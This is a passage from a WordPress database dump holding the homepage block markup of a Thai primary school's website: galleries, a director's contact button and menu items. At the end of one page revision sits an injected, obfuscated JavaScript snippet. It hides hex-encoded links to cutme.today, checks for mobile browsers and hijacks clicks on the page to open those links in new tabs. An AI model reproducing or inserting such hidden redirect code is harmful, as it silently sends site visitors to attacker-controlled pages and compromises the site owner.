%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 12:05:14','2024-07-27 05:05:14','',14,'http://pakhaeng.ssk.in.th/?p=127',0,'revision','',0),
(129,1,'2024-07-27 12:05:45','2024-07-27 05:05:45','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 